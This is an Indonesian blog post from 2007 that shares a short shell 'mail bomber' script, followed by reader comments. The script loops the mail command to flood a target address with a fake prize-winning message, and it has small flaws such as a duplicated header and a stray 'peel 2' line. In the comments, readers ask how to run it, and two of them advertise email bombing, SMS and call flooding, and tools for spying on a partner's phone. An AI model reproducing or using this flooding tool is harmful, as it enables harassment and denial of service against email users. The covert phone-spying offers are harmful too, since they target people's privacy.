jump to navigation

SH mail bomber November 3, 2007

Posted by bahroell in Scripting shell.
Tags: ,
trackback

Yang suka bomb mail, ini ada scriptnya.!

#!/bin/sh
if [ $# -lt 2 ]
then
echo “[+] Simple mail bomber”
echo “[+] $0 email@target <jumlah>”
exit 1
fi

#!/bin/sh
if [ $# -lt 2 ]
then
echo “[+] $0 email@target <jumlah>”
exit 1
fi
email=$1
i=1
s=1
echo “Selamat anda memenangkan undian” > /tmp/mail.t
while [ $i -le $2 ]
do
mail -s “Re. Gmana dengan anda???” $email < /tmp/mail.t
i=`expr $i + 1`
done
echo “[+] DONE”
peel 2
clear
cat /tmp/mail.t
rm -rf /tmp/mail.t

Komentar»

1. re4n - Januari 22, 2008

itu makenya gmn boz… akumaish g dong..
ajarin donk boz… bisa PM aja
soalnya aku juga lgi nyari mail forwarding yg seep
matur nuhun atas sarannya
thanks` b4

2. Nabil - Februari 21, 2008

Iya nih boss,,,,
Scriptnya kita simpen dengan format apa yah?
Dan cara makenya gimana??
Mohon pencerahannya………
thanx bgt

3. triono - Maret 28, 2008

ngak ngerti bossssssssss ?????????????????

4. Rojaz - Mei 16, 2008

Ora ngerti jez…

5. didi - November 4, 2008

bung tuh script dikasih ke alamat tujuan kita nge bom email orang yah ??
berhasil pa kagak tuh?
ada cara lain selain ngasih script???
berapa menit seX script itu bekerja nya????

6. Haris - November 13, 2008

ga ngerti……………, yang posting ini ngerti kaga sih makainya.

7. master - Desember 2, 2008

yang posting aja bingung makenya ,simpan dalam bentuk apa juga ga ngerti ,bodoh juga ,mosting ga tangung jawab.!!

8. :fuck: - Januari 27, 2009

heuehu modal copas tp ga ngerti… stupid nubitol.. “newbie kontol”

9. ajun - Maret 6, 2011

mau email bomber software mudah pakai nya masuk ke inbox atau sms flood ke hp miss call flood ke hp atau sms anti selingkuh spy hp kekasih atau block private number dll pv gua kalau ada yg minat hub 081288778897

10. ajun - Maret 6, 2011

mau email bomber software mudah pakai nya masuk ke inbox atau sms flood ke hp miss call flood ke hp atau sms anti selingkuh spy hp kekasih atau block private number melindungi pc dari anti deepfreeze supaya gak bisa di jebol deep freeze nya dll pv gua kalau ada yg minat hub 081288778897


Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: